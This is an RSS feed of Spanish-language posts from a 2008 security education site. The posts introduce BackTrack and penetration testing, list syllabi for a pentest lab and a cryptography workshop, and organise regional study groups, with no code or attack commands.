<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Labs DragonJAR</title>
	<atom:link href="http://labs.dragonjar.org/feed" rel="self" type="application/rss+xml" />
	<link>http://labs.dragonjar.org</link>
	<description>Laboratorios de Seguridad Informática: Comunidad DragonJAR</description>
	<pubDate>Mon, 25 Aug 2008 18:53:22 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.1</generator>
	<language>en</language>
			<item>
		<title>Test de penetración con BackTrack, Conceptos básicos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 18:22:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[BackTrack]]></category>

		<category><![CDATA[LiveCD]]></category>

		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=215</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>BackTrack</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.</p>
<p style="text-align: justify;"><span id="more-215"></span>Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://backtrack.offensive-security.com/index.php?title=Tools" target="_blank"><strong>Lista de herramientas incluídas en BackTrack</strong></a></p>
<p style="text-align: justify;">El proceso de instalación o puesta en marcha de este LiveCD es un tema que ya ha sido cubierto en diferentes ocasiones en Labs DragonJAR. Veamos algunos enlaces de como llevar a cabo este procedimiento:</p>
<p style="text-align: justify;"><a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-instalacion-de-maquinas-virtuales-i" target="_blank"><strong>Ejecución / Instalación de BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://www.dragonjar.org/backtrack-portable.xhtml" target="_blank"><strong>BackTrack Portable</strong></a></p>
<p style="text-align: justify;"><a href="http://hwagm.elhacker.net/htm/backtrack.htm" target="_blank"><strong>Instalar Back | Track en el HD de tú PC</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack-usb" target="_blank"><strong>Instalar BackTrack en una llave USB</strong></a></p>
<p style="text-align: justify;"><a href="http://www.kriptopolis.org/backtrack" target="_blank"><strong>Review BackTrack</strong></a></p>
<p style="text-align: justify;"><a href="http://kernelpanic.org.mx/2008/07/como-instalar-backtrack-3/" target="_blank"><strong>Como Instalar Back|Track 3</strong></a></p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos/feed</wfw:commentRss>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Contenido y Recursos</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos#comments</comments>
		<pubDate>Mon, 25 Aug 2008 15:59:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[BackTrack]]></category>

		<category><![CDATA[ARP]]></category>

		<category><![CDATA[fuzzing]]></category>

		<category><![CDATA[LiveCD]]></category>

		<category><![CDATA[Netcat]]></category>

		<category><![CDATA[Nmap]]></category>

		<category><![CDATA[Redirección]]></category>

		<category><![CDATA[spoofing]]></category>

		<category><![CDATA[SQL Injection]]></category>

		<category><![CDATA[Troyanos]]></category>

		<category><![CDATA[VMWare]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=211</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Para este nuevo recurso se hacen necesarios los siguiente elementos:</p>
<ol style="text-align: justify;">
<li><a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-cd" target="_blank">Imágen ISO</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-usb" target="_blank">LiveCD USB</a> / <a href="http://www.remote-exploit.org/cgi-bin/fileget?version=bt3-vm" target="_blank">Appliance</a> de <strong><a href="http://www.remote-exploit.org/backtrack.html" target="_blank">BackTrack</a></strong></li>
<li>Software de virtualización (<a href="http://www.vmware.com/lasp/products/ws/" target="_blank">VMWare WorkStation</a>, <a href="http://www.vmware.com/products/player/" target="_blank">VMWare Player</a>, <a href="http://es.wikipedia.org/wiki/QEMU" target="_blank">Qemu</a>, <a href="http://www.xoftwarelibre.org/virtualbox-ose-software-libre-para-virtualizacion" target="_blank">Virtual BOX</a>, <a href="http://www.xoftwarelibre.org/moka5-virtualizacion-libre-al-instante" target="_blank">MOKA5</a>, etc.)</li>
<li>PC de mediana capacidad.</li>
<li>Conexión a internet (algunos ejercicios, referencias)</li>
</ol>
<p style="text-align: justify;"><span id="more-211"></span><strong>Contenido temático:</strong></p>
<ol style="text-align: justify;">
<li>Conceptos básicos de BackTrack</li>
<li>Servicios básicos (DHCP, IP, Apache, SSHD, Tftp, VNC)</li>
<li>Entorno básico Bash</li>
<li>NetCat</li>
<li>Wireshark</li>
<li>Nmap</li>
<li>Técnicas de recolección de información</li>
<li>Recursos Web</li>
<li>Reconocimiento DNS</li>
<li>Reconocimiento SNMP</li>
<li>Reconocimiento SMTP</li>
<li>Recolección de información Microsoft Netbios</li>
<li>Escaneo de puertos</li>
<li>ARP Spoofing</li>
<li>Explotación de Buffer overflow en Windows</li>
<li>Fuzzing</li>
<li>Trabajando con Exploits</li>
<li>Transferencia de archivos</li>
<li>Frameworks de explotación</li>
<li>Ataques del lado del cliente</li>
<li>Redirección</li>
<li>Ataques a contraseñas</li>
<li>Vectores de ataques a aplicaciones Web</li>
<li>Troyanos</li>
<li>NTFS Alternate Data Streams</li>
<li>Rootkits</li>
</ol>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="../laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://es.wikipedia.org/wiki/Inyecci%C3%B3n_SQL" target="_blank">SQL Injection</a>, <a href="http://es.wikipedia.org/wiki/Caballo_de_Troya_(inform%C3%A1tica)" target="_blank">Troyanos</a>, <a href="http://www.dragonjar.org/anti-rootkit" target="_blank">RootKits</a>, <a href="http://www.ignaciomarcos.com.ar/index.php/2007/02/27/alternate-data-streams/" target="_blank">NTFS Alternate Data Streams</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i" target="_blank">Fuerza Bruta</a>, <a href="http://es.wikipedia.org/wiki/Redireccionamiento_de_puertos" target="_blank">Redirección</a>, <a href="http://www.trancek.es/2007/10/fuzzing-brute-force-vulnerability.html" target="_blank">Fuzzing</a>, <a href="http://es.wikipedia.org/wiki/Spoofing" target="_blank">Spoofing</a>, <a href="http://es.wikipedia.org/wiki/Netcat" target="_blank">NetCat</a>, <a href="http://es.wikipedia.org/wiki/Bash" target="_blank">Bash</a>, <a href="http://es.wikipedia.org/wiki/Nmap" target="_blank">Nmap</a>.</p>
<p style="text-align: justify;">Este nuevo recurso estará basado en el sistema de entrenamiento ofrecido por los propios desarrolladores y colaboradores del proyecto BackTrack (Remote-Exploit) <a href="http://www.offensive-security.com/" target="_blank">Offensive-security.com</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-contenido-y-recursos/feed</wfw:commentRss>
		</item>
		<item>
		<title>Test de penetración con BackTrack, Introducción</title>
		<link>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion</link>
		<comments>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion#comments</comments>
		<pubDate>Wed, 20 Aug 2008 16:33:40 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[BackTrack]]></category>

		<category><![CDATA[Ataques]]></category>

		<category><![CDATA[Distribución]]></category>

		<category><![CDATA[Escaneo]]></category>

		<category><![CDATA[Exploit]]></category>

		<category><![CDATA[LiveCD]]></category>

		<category><![CDATA[Sniffing]]></category>

		<category><![CDATA[Test de Penetración]]></category>

		<category><![CDATA[Vulnerabilidades]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=203</guid>
		<description><![CDATA[<img src="http://img372.imageshack.us/img372/9636/thumbbacktrackmy5.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Antes de comenzar con este nuevo recurso y que irá en paralelo con otros laboratorios en desarrollo (<a href="http://labs.dragonjar.org/category/hacking" target="_blank">Laboratorios- Hacking, Técnicas y contramedidas</a>, <a href="http://labs.dragonjar.org/category/hacktaller" target="_blank">DragoNLab-HackTaller</a> y <a href="http://labs.dragonjar.org/category/criptografia" target="_blank">Taller Técnicas Criptográficas</a>), es necesarios aclarar algunos conceptos sobre el mismo.<br />
No sería posible comenzar sin aclarar la finalidad de este laboratorio práctico, las herramientas necesarias y la terminología a utilizar.</p>
<p style="text-align: justify;">Comencemos entonces por definir los conceptos de <strong>Test de Penetración</strong> y <strong>BackTrack</strong>:</p>
<p style="text-align: justify;"><span id="more-203"></span><strong>Test de penetración:</strong><br />
Test de Penetración, también llamado a veces “hacking ético” es una evaluación activa de las medidas de seguridad de la información.<br />
En los entornos de red complejos actuales, la exposición potencial al riesgo es cada vez mayor y securizar los sistemas se convierten en un auténtico reto.<br />
A través del Test de Penetración es posible detectar el nivel de Seguridad Interna y Externa de los Sistemas de Información de la empresa, determinando el grado de acceso que tendría un atacante con intenciones maliciosas. Además, el servicio chequea las vulnerabilidades que pueden ser vistas y explotadas por individuos no autorizados, &#8220;crackers&#8221;, agentes de información, ladrones, antiguos empleados, competidores, etc.</p>
<p style="text-align: justify;"><strong>Los servicios de Test de Penetración permiten:</strong><br />
<strong>-</strong> Evaluar vulnerabilidades por medio de la identificación de debilidades de configuración que puedan ser explotadas.<br />
<strong>-</strong> Analizar y categorizar las debilidades explotables basadas en el impacto potencial y posibilidad de ocurrencia.<br />
<strong>-</strong> Proveer recomendaciones prioritizadas para mitigar y eliminar las debilidades.</p>
<p style="text-align: justify;">El Test de Penetración está dirigido a la búsqueda de agujeros de seguridad de forma focalizada en uno o varios recursos críticos, como puede ser el firewall o el servidor Web.</p>
<p style="text-align: justify;"><strong>BackTrack:</strong><br />
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.<br />
Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX.<br />
WHAX es la evolución del Whoppix,(WhiteHat Knoppix) el cual pasó a basarse en SLAX en lugar de en Knoppix.<br />
Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.<br />
Fue incluida en la famosa lista Top 100 Network Security Tools del 2006 disponible en SecTools.Org<br />
<a href="http://www.remote-exploit.org/backtrack.html" target="_blank"><strong>Web Oficial de BackTrack</strong></a></p>
<p style="text-align: justify;">Luego de tener claro las anteriores definiciones podemos entender que la finalidad de nuestro Laboratorio de Test de Penetración con BackTrack, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.</p>
<p style="text-align: justify;">Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.</p>
<p style="text-align: justify;"><strong>Palabras clave:</strong> <a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank">BackTrack</a>, <a href="http://elladodelmal.blogspot.com/2007/02/test-de-intrusion-i-de-vi.html" target="_blank">Test de Penetración</a>, <a href="http://es.wikipedia.org/wiki/Distribuci%C3%B3n_Linux" target="_blank">Distribución</a>, <a href="http://es.wikipedia.org/wiki/CD_aut%C3%B3nomo" target="_blank">LiveCD</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i" target="_blank">scanner de puertos</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i" target="_blank">Vulnerabilidades</a>, <a href="http://es.wikipedia.org/wiki/Exploit" target="_blank">exploits</a>, <a href="http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-sniffing-i" target="_blank">sniffers</a>, <a href="http://www.microsoft.com/spain/empresas/legal/forensic.mspx" target="_blank">análisis forense</a>, <a href="http://es.wikipedia.org/wiki/Comunicaci%C3%B3n_inal%C3%A1mbrica" target="_blank">Wireless</a>.</p>
<p style="text-align: justify;">En el próximo Laboratorio, definiré los recursos necesarios y el contenido temático del Laboratorio.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/test-de-penetracion-con-backtrack-introduccion/feed</wfw:commentRss>
		</item>
		<item>
		<title>Ciudades/Paises</title>
		<link>http://labs.dragonjar.org/ciudadespaises</link>
		<comments>http://labs.dragonjar.org/ciudadespaises#comments</comments>
		<pubDate>Mon, 18 Aug 2008 02:30:44 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[DragoNLab-HackTaller]]></category>

		<category><![CDATA[Comunidad DragonJAR]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=200</guid>
		<description><![CDATA[<img src="http://img527.imageshack.us/img527/5823/icolabsrj4.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Este será el espacio destinado para organizar y llevar a cabo los Laboratorios de Seguridad Informática DragonJAR por ciudades y paises.</p>
<p style="text-align: justify;">Los grupos se irán conformando desde el foro destinado para ello y aquí se plantearán los temas y se llevará registro de los mismos.</p>
<p style="text-align: justify;"><span id="more-200"></span><a href="http://comunidad.dragonjar.org/index.php?topic=275.0" target="_blank">Medellin</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=272.0" target="_blank">Pereira</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=159.0" target="_blank">Manizales</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=266.0" target="_blank">Popayán</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=267.0" target="_blank">Neiva</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=263.0" target="_blank">Cali</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=262.0" target="_blank">Bogotá</a></p>
<p style="text-align: justify;"><span id="msg_676" title="La gente de Ibagué que se reporte por favor en este post para organizar los grupos."><a href="http://comunidad.dragonjar.org/index.php?topic=271.0" target="_blank">Ibagué</a></span></p>
<p style="text-align: justify;"><span id="msg_663" title="La gente de Perú, que se reporte para realizar los laboratorios"><a href="http://comunidad.dragonjar.org/index.php?topic=261.0" target="_blank">Perú</a></span></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=274.0" target="_blank">Guatemala</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=270.0" target="_blank">Venezuela</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=265.0" target="_blank">Mexico</a></p>
<p style="text-align: justify;"><a href="http://comunidad.dragonjar.org/index.php?topic=264.0" target="_blank">Argentina</a></p>
<p style="text-align: justify;">En la ciudad de Medellín se llevó a cabo el primer HackTaller de la Comunidad (<a href="http://labs.dragonjar.org/solucion-y-seguimiento-del-hacktaller-01-dragonjar-i-de-viii" target="_blank">Registro del primer HAckTaller en Medellín</a>). Así mismo en la ciudad de Cali varios usuarios de la comunidad llevaron con éxito un laboratorio de seguridad.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/ciudadespaises/feed</wfw:commentRss>
		</item>
		<item>
		<title>Taller, Técnicas Criptográficas. La Criptología</title>
		<link>http://labs.dragonjar.org/taller-tecnicas-criptograficas-la-criptologia</link>
		<comments>http://labs.dragonjar.org/taller-tecnicas-criptograficas-la-criptologia#comments</comments>
		<pubDate>Sun, 17 Aug 2008 01:32:43 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[Criptografía]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=198</guid>
		<description><![CDATA[<img src="http://img225.imageshack.us/img225/1630/criptothumjh6.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;"><strong>La Criptología</strong></p>
<p style="text-align: justify;">La Criptología (del griego <strong>criptos=oculto</strong> y <strong>logos=tratado, ciencia</strong>) es el nombre genérico con el que se designan dos disciplinas opuestas y la vez complementarias: Criptografía y Criptoanálisis. La Criptografía se ocupa del diseño de procedimientos para cifrar, es decir, para enmascarar una determinada información de carácter confidencial. El Criptoanálisis, por su parte, se ocupa de romper esos procedimientos de cifrado para así recuperar la información original. Ambas disciplinas siempre se han desarrollado de forma paralela, pues cualquier método de cifrado lleva siempre emparejado su Criptoanálisis correspondiente.</p>
<p style="text-align: justify;"><span id="more-198"></span>La Criptografía como medio para proteger la información personal es un arte tan antiguo como la propia escritura. Como tal, permaneció durante siglos vinculada muy estrechamente a los círculos militares y diplomáticos, puesto que eran los únicos que en principio tenían auténtica necesidad de ella.</p>
<p style="text-align: justify;">En la actualidad la situación ha cambiado drásticamente: el desarrollo de las comunicaciones electrónicas, unido al uso masivo y generalizado de los computadores, hace posible la transmisión y almacenamiento de grandes flujos de información confidencial que es necesario proteger. Es entonces cuando la Criptografía pasa de ser una exigencia de minorías a convertirse en una necesidad real del hombre de la calle, que ve esta falta de protección de sus datos privados una amenaza para su propia intimidad.</p>
<p style="text-align: justify;">A y B son, respectivamente, el emisor y receptor de un determinado mensaje. A transforma el mensaje original (texto claro o texto fuente), mediante un determinado procedimiento de cifrado controlado por una clave, en un mensaje cifrado (criptograma) que se envía por un canal público. En recepción, B con conocimiento de la clave transforma ese criptograma en el texto fuente, recuperando así la información original.</p>
<p style="text-align: justify;">En el proceso de transmisión, el criptograma puede ser interceptado por un enemigo criptoanalista que lleva a cabo una labor de desencriptado; es decir, intenta, a partir del criptograma y sin conocimiento de la clave, recuperar el mensaje original. Un buen sistema criptográfico será, por tanto, aquel que ofrezca un descifrado sencillo pero un desencriptado imposible o, en su defecto, muy difícil.</p>
<p style="text-align: justify;">La finalidad de la Criptografía es múltiple: primeramente, mantener la confidencialidad del mensaje; es decir, que la información allí contenida permanezca secreta; a continuación, garantizar la autenticidad tanto del criptograma (integridad) como del par remitente/destinatario. En efecto, el criptograma recibido da de ser realmente el enviado (evitando así manipulaciones o alteraciones en el proceso de transmisión), a la vez que el remitente y destinatario han de ser realmente quienes dicen ser, y no remitentes y/o destinatarios fraudulentos. La Criptografía clásica se ocupaba únicamente del primer aspecto, mientras que la Criptografía de hoy en día, basada en el concepto de comunicaciones seguras, ha de garantizar conjuntamente todas ellas.</p>
<p style="text-align: justify;">El tipo particular de transmisión aplicada al texto claro o las características de las claves utilizadas marcan la diferencia entre los diversos métodos criptográficos. Una primera clasificación en base a las claves utilizadas puede desglosarse tal y como sigue:</p>
<ul style="text-align: justify;">
<li><strong> Métodos simétricos:</strong> son aquellos en los que la clave de cifrado coincide con la de descifrado. Lógicamente, dicha clave tiene que permanecer secreta, lo que presupone que emisor y receptor se han puesto de acuerdo previamente en la determinación de la misma, o bien que existe un centro de distribución de claves que se la ha hecho llegar a ambos por un canal seguro.</li>
</ul>
<ul style="text-align: justify;">
<li><strong> Métodos asimétricos:</strong> son aquellos en los que la clave de cifrado es diferente a la de descifrado. En general, la clave de cifrado es conocida libremente por el público, mientras que la de descifrado es conocida únicamente por el usuario.</li>
</ul>
<p style="text-align: justify;">Los métodos simétricos son propios de la Criptografía clásica o Criptografía de clave secreta, mientras que los métodos asimétricos corresponden a la Criptografía de clave pública, introducida por Difie y Hellman en 1976.</p>
<p style="text-align: justify;">Una de las diferencias fundamentales entre la Criptografía clásica y la Criptografía de hoy en día radica en el concepto de seguridad. Antes, los procedimientos de cifrado tenían una seguridad probable; hoy, los procedimientos de cifrado han de tener una seguridad matemáticamente demostrable. Esto lleva a una primera clasificación de seguridad criptográfica:</p>
<ul style="text-align: justify;">
<li><strong> Seguridad incondicional (teórica):</strong> el sistema es seguir frente a un atacante con tiempo y recursos computacionales ilimitados (ej. Cifrado Vernam).</li>
</ul>
<ul style="text-align: justify;">
<li><strong> Seguridad computacional (práctica):</strong> el sistema es seguro frente a un atacante con tiempo y recursos computacionales limitados (ej. Sistemas de clave pública basados en problemas de alta complejidad de cálculo).</li>
</ul>
<ul style="text-align: justify;">
<li> <strong>Seguridad probable:</strong> no se puede demostrar su integridad, pero el sistema no ha sido violado (ej. DES).</li>
</ul>
<ul style="text-align: justify;">
<li><strong> Seguridad condicional:</strong> todos los demás sistemas, seguros en tanto que el enemigo carece de medios para atacarlos.</li>
</ul>
<p style="text-align: justify;">Con los antiguos procedimientos manuales y lentos de Criptoanálisis era suficiente la seguridad condicional, pues en la mayoría de los casis se obtenía el desencriptado del mensaje cuando la información del documento había perdido validez. Si el criptoanálisis tuvo éxitos de importancia fue sólo porque, al igual que era lento el proceso de análisis, lo era también el de cambio de claves. En la actualidad, con el uso de potentes computadores para el Criptoanálisis, los operadores criptográficos tienen que tener propiedades matemáticas que los hagan invulnerables no sólo en el presente, con nuestros conocimientos actuales de matemáticas y el estado actual de desarrollo de los computadores, sino también en un futuro a corto y medio plazo.</p>
<p style="text-align: justify;">Puesto que las comunicaciones electrónicas se usan hoy en día para casi todas las actividades de interés social, están expuestas a todos los trucos y manipulaciones, consecuencia de las flaquezas humanas. Si en el mundo existieran honradez y confianza mutua, no habría necesidad de la Criptografía (afortunadamente no es así); pero, a falta de aquéllas, la Criptografía trata de suplirlas con protocolos y algoritmos matemáticos de seguridad demostrable.</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/taller-tecnicas-criptograficas-la-criptologia/feed</wfw:commentRss>
		</item>
		<item>
		<title>Taller, Técnicas Criptográficas. Introducción y Contenido</title>
		<link>http://labs.dragonjar.org/taller-tecnicas-criptograficas-introduccion-y-contenido</link>
		<comments>http://labs.dragonjar.org/taller-tecnicas-criptograficas-introduccion-y-contenido#comments</comments>
		<pubDate>Sun, 17 Aug 2008 01:24:58 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
		
		<category><![CDATA[Criptografía]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=195</guid>
		<description><![CDATA[<img src="http://img225.imageshack.us/img225/1630/criptothumjh6.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Nace una nueva propuesta de capacitación e investigación de La Comunidad DragonJAR-Labs DragnJAR, en este caso, La Criptografía. Tema que entrará a compartir escena con los apartados propios de los Laboratorios: <a href="http://labs.dragonjar.org/category/hacking" target="_blank"><strong>Laboratorios: Hacking - Técnicas y contramedidas</strong></a>, <a href="http://labs.dragonjar.org/category/hacktaller" target="_blank"><strong>DragonLabs-HackTaller</strong></a> y algunos otros que estaré anunciando en el transcurso de la semana. <img src='http://labs.dragonjar.org/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p>Para comenzar y a manera de introducción, enumero el contenido temático de este nuevo apartado:</p>
<p style="text-align: justify;"><span id="more-195"></span><strong>Contenido Temático</strong></p>
<p><strong>La Criptología</strong></p>
<ul>
<li>Introducción</li>
<li>Procedimientos clásicos de cifrado</li>
<li>Introducción al Criptoanálisis</li>
<li>Criptoanálisis básico</li>
</ul>
<p style="text-align: justify;"><strong>Criptográfia de clave secreta: Métodos de cifrado en flujo</strong></p>
<ul>
<li>Generadores pseudoaleatorios de secuencia cifrante</li>
<li>Estructuras básicas para la generación de secuencias cifrantes</li>
<li>Filtrado no lineal</li>
<li>Combinadores no lineales</li>
</ul>
<p><strong>Criptografía de clave secreta: Métodos de cifrado en bloque</strong></p>
<ul>
<li>Arquitectura del cifrado en bloque</li>
<li>Cifrados de Feistel</li>
<li>DES</li>
<li>Modos de implementación de los cifrados en bloque</li>
<li>Cifrado múltiple</li>
<li>IDEA</li>
<li>RC5</li>
<li>Un algoritmo de cifrado con “llave maestra”: el Skipjack</li>
<li>Ataques especializados a los cifrados en bloque</li>
</ul>
<p style="text-align: justify;"><strong>Gestión de claves simétricas</strong></p>
<ul>
<li>Introducción</li>
<li>Clave maestra y almacenamiento de claves</li>
<li>Generación de claves maestras</li>
<li>Predistribución de claves maestras</li>
<li>Vida de una clave de cliente</li>
<li>Protocolos de comunicación</li>
</ul>
<p style="text-align: justify;"><strong>Aplicaciones y arquitecturas con cifrado simétrico</strong></p>
<ul>
<li>Autenticación de mensajes (MAC)</li>
<li>Firma digital</li>
<li>Identificación personal</li>
<li>Tarjetas electrónicas</li>
<li>Configuraciones de cifrado</li>
</ul>
<p style="text-align: justify;"><strong>Criptosistemas de clave pública</strong></p>
<ul>
<li>Definiciones</li>
<li>Cambio de clave de Diffie-Hellman</li>
<li>Criptosistemas de clave pública</li>
<li>Criptosistemas RSA</li>
<li>Ataquea al criptosistema RSA</li>
<li>Criptosistema de ElGamal</li>
<li>Ataque al criptosistema de ElGamal</li>
<li>Criptosistemas de curvas elípticas</li>
<li>Criptosistema de la mochila tramposa</li>
</ul>
<p style="text-align: justify;"><strong>Protocolos criptográficos y firmas digitales</strong></p>
<ul>
<li>Firma digital</li>
<li>Firma digital del criptosistema RSA</li>
<li>Firma digital del criptosistema de ElGamal</li>
<li>Funciones hash</li>
</ul>
<p style="text-align: justify;"><strong>Aplicaciones de la Criptografía de clave pública</strong></p>
<ul>
<li>Autenticación de un mensaje</li>
<li>Identificación del usuario</li>
<li>Lanzamiento de una moneda por teléfono</li>
<li>Póquer por teléfono</li>
<li>Secreto dividido</li>
<li>Descubrimiento parcial de secretos. Problema del millonario</li>
<li>Transferencia inconsciente</li>
<li>Venta de secretos</li>
<li>Esquema electoral</li>
<li>Descubrimiento mínimo</li>
<li>Intercambio de secretos</li>
<li>Firma de un contrato</li>
<li>Correo con acuse de recibo</li>
<li>Computación con datos encriptados</li>
<li>Canales subliminales</li>
<li>Protección de software</li>
</ul>
<p style="text-align: justify;"><strong>Aplicaciones criptográficas en redes de comunicaciones</strong></p>
<ul>
<li>Introducción</li>
<li>Principios de seguridad en redes de comunicaciones</li>
<li>Aplicaciones de seguridad en redes de comunicaciones</li>
<li>Sistema de autenticación</li>
<li>Seguridad en Internet</li>
<li>Seguridad en la Web</li>
<li>Correo electrónico seguro</li>
<li>Aplicaciones bancarias y comercio electrónico</li>
<li>ISO 8730</li>
<li>SWIFT (Society for Worldwide Interbank Financial Telecommunication)</li>
<li>ETEBAC 5</li>
<li>Comercio electrónico</li>
</ul>
<p style="text-align: justify;"><strong>Métodos matemáticos utilizados en Criptografía</strong></p>
<p><strong>Nociones básicas sobre la Teoría de la Complejidad Computacional</strong></p>
<p><strong>Criptografía visual y criptosistemas hiperelípticos</strong></p>
<p><strong>Normativa sobre seguridad</strong></p>
<p><strong>Problemas de Criptología</strong></p>
<p><strong>Bibliografía sobre Criptografía</strong></p>
<p>Para este nuevo recurso utilizaremos como guía, el material bibliográfico ofrecido por el libro: <strong><a href="http://www.casadellibro.com/fichas/fichabiblio/0,,2900000734651,00.html?codigo=2900000734651&amp;nombre=TECNICAS%20CRIPTOGRAFICAS%20DE%20PROTECCION%20DE%20DATOS%20%282%AA%20ED%2E%29%20%28INCLUYE%20DISQUETE%29" target="_blank">Técnicas Criptográficas de protección de datos</a></strong>, de los autores Amparo Fuster, Dolores de la Guía Martínez, Luis Hernández Encinas, Fausto Montoya Vitini y Jaime Muñoz Masqué.</p>
<p>El taller pretende recoger de manera práctica los apartados más importantes de este recurso.</p>
